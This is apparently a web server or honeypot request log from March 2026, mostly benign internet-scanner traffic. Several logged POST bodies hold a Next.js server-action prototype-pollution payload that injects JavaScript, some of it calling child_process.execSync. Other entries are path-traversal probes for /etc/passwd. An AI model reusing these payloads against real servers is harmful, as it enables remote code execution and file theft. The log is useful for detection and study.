RemoteAddr: 195.3.221.86:59354
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-07 00:56:47] === HTTP Request ===
===================
------WebKitFormBoundaryx89415584681--
------WebKitFormBoundaryx89415584681
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx89415584681
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 74056+true+1207405;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx89415584681
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx89415584681
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_89415584681
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59344
Path: /api
URL: /api
Method: POST
[2026-03-07 00:56:47] === HTTP Request ===
===================
------WebKitFormBoundaryx777247878613--
------WebKitFormBoundaryx777247878613
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx777247878613
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 177564+true+4377283;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx777247878613
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_777247878613
Next-Action: x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx777247878613
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59338
Path: /_next
URL: /_next
Method: POST
[2026-03-07 00:56:47] === HTTP Request ===
[2026-03-07 00:56:47] Main page accessed - IP: 195.3.221.86:59324
===================
------WebKitFormBoundaryx1346744209609--
------WebKitFormBoundaryx1346744209609
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1346744209609
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 261324+true+5153542;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1346744209609
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
X-Nextjs-Html-Request-Id: ilovepoop_1346744209609
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1346744209609
Connection: close
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59324
Path: /
URL: /
Method: POST
[2026-03-07 00:56:47] === HTTP Request ===
[2026-03-07 00:56:46] Main page accessed - IP: 195.3.221.86:59312
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:59312
Path: /
URL: /
Method: GET
[2026-03-07 00:56:46] === HTTP Request ===
[2026-03-07 00:00:21] Main page accessed - IP: 45.156.129.46:57020
===================
Accept: */*
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.86 Safari/537.36 BitSightBot/1.0
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.156.129.46:57020
Path: /
URL: /
Method: GET
[2026-03-07 00:00:21] === HTTP Request ===
[2026-03-06 23:43:31] Main page accessed - IP: 172.30.0.12:45154
===================
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Scrapy/2.13.4 (+https://scrapy.org)
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 34.91.212.219
Accept-Language: en
Accept-Encoding: gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:45154
Path: /
URL: /
Method: GET
[2026-03-06 23:43:31] === HTTP Request ===
[2026-03-06 23:42:56] Main page accessed - IP: 205.210.31.46:64878
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru
RemoteAddr: 205.210.31.46:64878
Path: /
URL: /
Method: GET
[2026-03-06 23:42:56] === HTTP Request ===
[2026-03-06 22:25:08] Main page accessed - IP: 198.235.24.82:62320
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: finance.vulnberries.ru
RemoteAddr: 198.235.24.82:62320
Path: /
URL: /
Method: GET
[2026-03-06 22:25:08] === HTTP Request ===
[2026-03-06 21:51:18] Main page accessed - IP: 172.30.0.12:50898
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 198.235.24.41
Via: 1.1 Caddy
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50898
Path: /
URL: /
Method: GET
[2026-03-06 21:51:18] === HTTP Request ===
[2026-03-06 21:16:26] Main page accessed - IP: 205.210.31.64:65298
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 205.210.31.64:65298
Path: /
URL: /
Method: GET
[2026-03-06 21:16:26] === HTTP Request ===
[2026-03-06 20:17:41] Main page accessed - IP: 172.30.0.12:35232
===================
X-Forwarded-Proto: https
X-Forwarded-For: 34.254.202.161
Via: 1.0 Caddy
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: identity
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
User-Agent: Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35232
Path: /
URL: /
Method: GET
[2026-03-06 20:17:41] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.105:46888
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-06 18:07:34] === HTTP Request ===
[2026-03-06 18:07:33] Main page accessed - IP: 85.142.100.105:46874
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +https://www.cyberok.ru/policy.html)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.105:46874
Path: /
URL: /
Method: GET
[2026-03-06 18:07:33] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.153.116
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49612
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-06 17:43:03] === HTTP Request ===
[2026-03-06 17:42:54] Main page accessed - IP: 172.30.0.12:49612
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.153.116
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49612
Path: /
URL: /
Method: GET
[2026-03-06 17:42:54] === HTTP Request ===
===================
------WebKitFormBoundaryx353614575952--
------WebKitFormBoundaryx353614575952
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx353614575952
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 300741+true+1175811;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx353614575952
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
X-Nextjs-Html-Request-Id: ilovepoop_353614575952
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx353614575952
Next-Action: x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49320
Path: /api/route
URL: /api/route
Method: POST
[2026-03-06 17:37:09] === HTTP Request ===
===================
------WebKitFormBoundaryx983754247383--
------WebKitFormBoundaryx983754247383
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx983754247383
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 285829+true+3441758;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx983754247383
X-Nextjs-Html-Request-Id: ilovepoop_983754247383
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx983754247383
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49314
Path: /app
URL: /app
Method: POST
[2026-03-06 17:37:09] === HTTP Request ===
===================
------WebKitFormBoundaryx15652665921--
------WebKitFormBoundaryx15652665921
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx15652665921
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 4208+true+3719740;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx15652665921
X-Nextjs-Html-Request-Id: ilovepoop_15652665921
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/134.0.6998.99 Mobile/15E148 Safari/604.1
Content-Length: 512
X-Nextjs-Request-Id: poop1234
Next-Action: x
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx15652665921
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49300
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-06 17:37:09] === HTTP Request ===
===================
------WebKitFormBoundaryx947523709861--
------WebKitFormBoundaryx947523709861
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx947523709861
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 254723+true+3719820;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx947523709861
X-Nextjs-Html-Request-Id: ilovepoop_947523709861
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx947523709861
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Connection: close
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:49298
Path: /api
URL: /api
Method: POST
[2026-03-06 17:37:09] === HTTP Request ===
===================
------WebKitFormBoundaryx1912960042628--
------WebKitFormBoundaryx1912960042628
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1912960042628
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 282829+true+6763663;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1912960042628
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1912960042628
X-Nextjs-Request-Id: poop1234
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1912960042628
Next-Action: x
Accept-Encoding: gzip, deflate
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:44496
Path: /_next
URL: /_next
Method: POST
[2026-03-06 17:37:09] === HTTP Request ===
[2026-03-06 17:37:07] Main page accessed - IP: 195.3.221.86:44494
===================
------WebKitFormBoundaryx1298269848651--
------WebKitFormBoundaryx1298269848651
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1298269848651
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 335813+true+3866050;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1298269848651
X-Nextjs-Html-Request-Id: ilovepoop_1298269848651
Accept-Encoding: gzip, deflate
Content-Length: 522
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1298269848651
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:44494
Path: /
URL: /
Method: POST
[2026-03-06 17:37:07] === HTTP Request ===
[2026-03-06 17:37:07] Main page accessed - IP: 195.3.221.86:44480
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 195.3.221.86:44480
Path: /
URL: /
Method: GET
[2026-03-06 17:37:07] === HTTP Request ===
[2026-03-06 17:10:08] Main page accessed - IP: 205.210.31.198:62214
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: auth.vulnberries.ru
RemoteAddr: 205.210.31.198:62214
Path: /
URL: /
Method: GET
[2026-03-06 17:10:08] === HTTP Request ===
[2026-03-06 17:00:45] Main page accessed - IP: 172.30.0.12:57140
===================
----------WebKitFormBoundary503f2d8f59a34ff5--
[]
Content-Disposition: form-data; name="2"
----------WebKitFormBoundary503f2d8f59a34ff5
"$@0"
Content-Disposition: form-data; name="1"
----------WebKitFormBoundary503f2d8f59a34ff5
{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "throw Object.assign(new Error('NEXT_REDIRECT'),{digest: 'NEXT_REDIRECT;push;/safe_check_11111;307;'});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ----------WebKitFormBoundary503f2d8f59a34ff5
X-Nextjs-Request-Id: e36acc35
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 3.106.139.103
Via: 1.1 Caddy
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundary503f2d8f59a34ff5
Accept: */*
X-Forwarded-Proto: https
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 636
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57140
Path: /
URL: /
Method: POST
[2026-03-06 17:00:45] === HTTP Request ===
[2026-03-06 17:00:44] Main page accessed - IP: 172.30.0.12:57140
===================
----------WebKitFormBoundarya180b310b9f042e3--
[]
Content-Disposition: form-data; name="2"
----------WebKitFormBoundarya180b310b9f042e3
"$@0"
Content-Disposition: form-data; name="1"
----------WebKitFormBoundarya180b310b9f042e3
{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
----------WebKitFormBoundarya180b310b9f042e3
""
Content-Disposition: form-data; name="1_$ACTION_ID_vercel"
Body: ----------WebKitFormBoundarya180b310b9f042e3
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundarya180b310b9f042e3
Accept-Encoding: gzip, deflate
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 3.106.139.103
Next-Action: x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
X-Nextjs-Request-Id: e36acc35
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept: */*
Content-Length: 860
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57140
Path: /
URL: /
Method: POST
[2026-03-06 17:00:44] === HTTP Request ===
[2026-03-06 17:00:44] Main page accessed - IP: 172.30.0.12:57140
===================
----------WebKitFormBoundary8e826cd2bcef4a85--
[]
Content-Disposition: form-data; name="2"
----------WebKitFormBoundary8e826cd2bcef4a85
"$@0"
Content-Disposition: form-data; name="1"
----------WebKitFormBoundary8e826cd2bcef4a85
{"then": "$1:__proto__:then", "status": "resolved_model", "reason": -1, "value": "{\"then\":\"$B1337\"}", "_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});", "_chunks": "$Q2", "_formData": {"get": "$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ----------WebKitFormBoundary8e826cd2bcef4a85
Next-Action: x
Content-Type: multipart/form-data; boundary=--------WebKitFormBoundary8e826cd2bcef4a85
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 3.106.139.103
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 748
X-Nextjs-Request-Id: e36acc35
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57140
Path: /
URL: /
Method: POST
[2026-03-06 17:00:44] === HTTP Request ===
[2026-03-06 17:00:44] Main page accessed - IP: 172.30.0.12:57140
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
X-Nextjs-Request-Id: e36acc35
X-Forwarded-For: 3.106.139.103
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Next-Action: x
Accept: */*
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:57140
Path: /
URL: /
Method: GET
[2026-03-06 17:00:44] === HTTP Request ===
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: ipv4-internet.yandex.net:443
RemoteAddr: 176.65.149.182:39378
Path:
URL: //ipv4-internet.yandex.net:443
Method: CONNECT
[2026-03-06 16:56:54] === HTTP Request ===
[2026-03-06 15:31:10] Main page accessed - IP: 172.30.0.12:47426
===================
User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
From: gptbot(at)openai.com
Accept: */*
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.227.20
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47426
Path: /
URL: /
Method: GET
[2026-03-06 15:31:10] === HTTP Request ===
===================
X-Forwarded-Proto: https
X-Forwarded-For: 74.7.175.185
From: oai-searchbot(at)openai.com
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Accept-Encoding: gzip, br, deflate
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:47426
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-06 15:31:08] === HTTP Request ===
[2026-03-06 15:20:10] Main page accessed - IP: 176.65.149.45:44330
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:44330
Path: /
URL: /
Method: GET
[2026-03-06 15:20:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.114:6152
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-06 14:57:33] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 206.168.34.114:64366
Path: *
URL: *
Method: PRI
[2026-03-06 14:57:27] === HTTP Request ===
[2026-03-06 14:57:21] Main page accessed - IP: 206.168.34.114:64356
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 206.168.34.114:64356
Path: /
URL: /
Method: GET
[2026-03-06 14:57:21] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:44504
Path: /../../../../../../../../etc/passwd
URL: /%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
Method: GET
[2026-03-06 14:41:31] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.42.231.182:44502
Path: /../../../../../../etc/passwd
URL: /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Method: GET
[2026-03-06 14:41:31] === HTTP Request ===
[2026-03-06 14:27:21] Main page accessed - IP: 112.124.56.231:59256
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 112.124.56.231:59256
Path: /
URL: /
Method: GET
[2026-03-06 14:27:21] === HTTP Request ===
[2026-03-06 14:27:21] Main page accessed - IP: 112.124.56.231:59212
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 112.124.56.231:59212
Path: /
URL: /
Method: GET
[2026-03-06 14:27:21] === HTTP Request ===
[2026-03-06 14:27:10] Main page accessed - IP: 112.124.56.231:58622
===================
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; mcafee-epo-agent)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.56.231:58622
Path: /
URL: /
Method: GET
[2026-03-06 14:27:10] === HTTP Request ===
[2026-03-06 14:27:09] Main page accessed - IP: 112.124.56.231:58534
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 112.124.56.231:58534
Path: /
URL: /
Method: GET
[2026-03-06 14:27:09] === HTTP Request ===
===================
Body: <soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Content-Length: 441
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.56.231:58502
Path: /sdk
URL: /sdk
Method: POST
[2026-03-06 14:27:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.56.231:58494
Path: /evox/about
URL: /evox/about
Method: GET
[2026-03-06 14:27:09] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.56.231:58496
Path: /HNAP1
URL: /HNAP1
Method: GET
[2026-03-06 14:27:09] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 112.124.56.231:58438
Path: /nmaplowercheck1772807228
URL: /nmaplowercheck1772807228
Method: GET
[2026-03-06 14:27:09] === HTTP Request ===
[2026-03-06 14:27:01] Main page accessed - IP: 112.124.56.231:57902
===================
Protocol: HTTP/1.0
Host:
RemoteAddr: 112.124.56.231:57902
Path: /
URL: /
Method: GET
[2026-03-06 14:27:01] === HTTP Request ===
[2026-03-06 14:26:30] Main page accessed - IP: 87.236.176.26:59541
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 87.236.176.26:59541
Path: /
URL: /
Method: GET
[2026-03-06 14:26:30] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.45:33472
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-06 13:43:46] === HTTP Request ===
[2026-03-06 13:43:46] Main page accessed - IP: 85.217.140.45:33464
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.45:33464
Path: /
URL: /
Method: GET
[2026-03-06 13:43:46] === HTTP Request ===
